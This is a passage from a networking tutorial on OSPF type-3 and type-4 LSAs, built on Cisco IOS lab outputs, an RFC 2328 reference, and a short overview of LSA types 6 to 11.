MTID: 0 Metric: 2
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 895
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(Network)
Link State ID: 192.168.45.0 (summary Network Number)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x781D
Length: 28
Network Mask: /24
MTID: 0 Metric: 1
We have enough experience now to reconstruct area 1 graph from its LSDB so the focus for the rest of the article would be area 0 point of view on OSPF AS.
The only thing left to verify is the trigger for LSA3 generation. Let’s filter 5.5.5.55/32 from R4 RIB and see if it is propagated into area 0 while not being present in routing table.
R4(config)#ip prefix-list FILTER deny 5.5.5.55/32
R4(config)#ip prefix-list FILTER permit 0.0.0.0/0 le 32
R4(config)#router ospf 1
R4(config-router)#distribute-list prefix FILTER in
R4#
R4# show ip route ospf
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
O 1.1.1.1 [110/3] via 192.168.234.2, 00:00:05, FastEthernet0/0
3.0.0.0/32 is subnetted, 1 subnets
O E2 3.3.3.3 [110/20] via 192.168.234.3, 00:00:05, FastEthernet0/0
5.0.0.0/32 is subnetted, 1 subnets
O 5.5.5.5 [110/2] via 192.168.45.5, 00:00:05, FastEthernet0/1
O 192.168.12.0/24 [110/2] via 192.168.234.2, 00:00:05, FastEthernet0/0
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 228 0x80000028 0x009E4C 3
2.2.2.2 2.2.2.2 804 0x80000014 0x004010 3
3.3.3.3 3.3.3.3 1868 0x8000000B 0x003629 1
4.4.4.4 4.4.4.4 1697 0x8000000D 0x00F064 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 653 0x80000007 0x00E4BE
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 1615 0x80000001 0x003ED8
5.5.5.55 4.4.4.4 1602 0x80000001 0x00489C
192.168.45.0 4.4.4.4 1688 0x80000001 0x00781D
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 1868 0x80000003 0x00FE87 0
R2#
R2#show ip route ospf
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
O 1.1.1.1 [110/2] via 192.168.12.1, 06:10:34, FastEthernet0/1
3.0.0.0/32 is subnetted, 1 subnets
O E2 3.3.3.3 [110/20] via 192.168.234.3, 01:37:25, FastEthernet0/0
5.0.0.0/32 is subnetted, 2 subnets
O IA 5.5.5.5 [110/3] via 192.168.234.4, 00:26:58, FastEthernet0/0
O IA 5.5.5.55 [110/3] via 192.168.234.4, 00:26:44, FastEthernet0/0
O IA 192.168.45.0/24 [110/2] via 192.168.234.4, 00:28:10, FastEthernet0/0
According to RFC 2328 section 12.4.3, LSA3 routes are “determined by examining the routing table structure”. However, filtering 5.5.5.55/32 from the RIB does not prevent R4 (IOS) from generating a corresponding LSA3 into backbone area. Unlike DV IGPs, OSPF is not designed for RIB filtering at an arbitrary point of network that’s why using such a knob is generally not a good idea.
LSA4: ASBR-summary LSA
As you might have already guessed, LSA4 summarizes topology information about ASBRs. Remember that LSA5 propagate throughout the whole AS? An LSA can be changed only by its owner to ensure LSDB consistency across an area. There is also no vertex to anchor to if ASBR is located in a different area since Advertising Router ID would be unknown. LSA4 mission is to fix such a misfortune. It has the same layout as LSA3:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS age | Options | 4 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link State ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Advertising Router |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS sequence number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS checksum | length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Network Mask |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0 | metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TOS | TOS metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
The difference is in LSID meaning: while LSA3 lists the network number in this field, LSA4 places ASBR RID there. Let’s generate some LSA5 in area 1 and see what effect it has on backbone area.
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 1561 0x80000028 0x009E4C 3
2.2.2.2 2.2.2.2 112 0x80000015 0x003E11 3
3.3.3.3 3.3.3.3 1180 0x8000000C 0x00342A 1
4.4.4.4 4.4.4.4 1221 0x8000000E 0x00EE65 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 1986 0x80000007 0x00E4BE
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 960 0x80000002 0x003CD9
5.5.5.55 4.4.4.4 960 0x80000002 0x00469D
192.168.45.0 4.4.4.4 960 0x80000002 0x00761E
Summary ASB Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 10 0x80000001 0x0026F0
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 1180 0x80000004 0x00FC88 0
6.6.6.6 5.5.5.5 16 0x80000001 0x00E997 0
LSA4 are generated only by ABRs when the latter transfers LSA5 from one area to another. In our case, 6.6.6.6/32 triggers R4 to create LSA4 for R5.
R2#show ip ospf database asbr-summary
OSPF Router with ID (2.2.2.2) (Process ID 1)
Summary ASB Link States (Area 0)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 144
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(AS Boundary Router)
Link State ID: 5.5.5.5 (AS Boundary Router address)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x26F0
Length: 28
Network Mask: /0
MTID: 0 Metric: 1
Besides ASBR ID, LSA4 also carries the metric to reach ASBR from ABR perspective. Now the node, that can be considered an owner of LSA5 prefix within the area, can be easily established, thus closing the last gap in extending the graph across AS.
LSA 6, 7 and beyond
There are also a few LSA types left that we did not previously cover. In this section I would like to briefly look through them. Some of these LSAs represent gradual modifications to the original algorithm; however, the changes are not drastic, although being a topic of their own, that’s why detailed description of these LSAs are out of scope of this article.
LSA6 was allocated for multicast OSPF extension which has been obsolete for a very long time.
LSA7 is a knob to allow external prefixes to be injected into stub areas, turning them into so called not-so-stubby areas or NSSA. If FA in LSA5 gave you creeps, LSA7 would make your hair stand on end.
LSA8 was aimed to expand LSA5 via additional attributes but it didn’t make it out of the draft.
LSA9 (link-local), 10 (area-local) and 11 (AS-local) are called opaque LSAs. They are designed to carry arbitrary information; these LSAs are extensively used for calculating MPLS TE tunnels via constrained SFP (CSPF).